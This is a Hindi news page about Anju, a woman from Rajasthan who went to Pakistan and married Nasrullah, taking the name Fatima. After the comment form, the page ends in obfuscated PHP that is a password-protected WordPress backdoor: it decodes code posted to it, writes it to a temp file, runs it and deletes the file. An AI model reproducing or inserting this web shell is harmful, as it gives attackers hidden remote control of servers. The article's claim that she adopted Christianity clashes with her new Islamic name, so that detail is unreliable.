भारत से पाकिस्तान पहुंची अंजू ने नसरुल्लाह से की शादी, धर्म और नाम भी बदला, कहा- मैं बहुत खुश हूं

Uttarakhand Press 27 July 2023: Anju Nasrulla News: राजस्थान की रहने वाली अंजू अपने प्रेमी से मिलने पाकिस्तान गई थी. 34 वर्षीय अंजू की पाकिस्तानी व्यक्ति नसरुल्लाह से फेसबुक पर दोस्ती हुई और फिर उसे उससे प्यार हो गया.

भारत से पाकिस्तान पहुंची अंजू (Anju) ने नसरुल्लाह (Nasrulla) के साथ शादी कर ली है. अंजू ने ईसाई धर्म अपना लिया और नया इस्लामी नाम फातिमा (Fatima) रख लिया. मंगलवार (25 जुलाई) को दोनों की शादी का वीडियो भी सामने आया है. अंजू और नसरुल्लाह की शादी दीर अपर के डिस्ट्रिक्ट कोर्ट में हुई. शादी के बाद अंजू ने कहा कि मैं बहुत खुश हूं. मेरे पास कम समय है, मुझे फिर यहां आना चाहिए.

अंजू का जन्म उत्तर प्रदेश के कैलोर गांव में हुआ था और वह राजस्थान के अलवर में रहती थी. नसरुल्लाह और अंजू की दोस्ती 2019 में फेसबुक के जरिए हुई थी. बीते दिन ही नसरुल्लाह ने अंजू से प्रेम संबंध होने के दावों को खारिज करते हुए कहा था कि उनकी शादी करने की कोई प्लानिंग नहीं है और अंजू वीजा की अवधि पूरी होने पर 20 अगस्त को स्वदेश लौट जाएगी.

पहले से शादीशुदा है अंजू:
अब दोनों की शादी करने की खबर सामने आई. दोनों का एक वीडियो भी सामने आया है. अंजू पाकिस्तान के खैबर पख्तूनख्वा सूबे के कबाइली जिले ऊपरी दीर में नसरुल्लाह से मिलने गई थी. अंजू पहले से शादीशुदा है और उसके दो बच्चे भी हैं. अंजू की 15 साल की बेटी और छह साल का बेटा है.

जयपुर जाने की बात कहकर निकली थी घर से:
अंजू के पति अरविंद राजस्थान में रहते हैं. उन्होंने उम्मीद जताई थी कि अंजू जल्द ही वापस आ जाएगी. अरविंद ने कहा था कि उनकी पत्नी गुरुवार को जयपुर जाने की बात कहकर घर से निकली थी, लेकिन बाद में परिवार को जानकारी मिली कि वह पाकिस्तान पहुंच गई है.

Read Previous

मुजफ्फरनगर में फैक्टरी में बॉयलर फटने से तेज धमाका, दो मजदूरों की मौत, एक गंभीर रूप से घायल

Read Next

Nainital: मल्लीताल रोपवे की बैरिंग टूटने से हवा में लटकी 13 जिंदगियां, एक घंटे तक अटकी रही सांसें

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}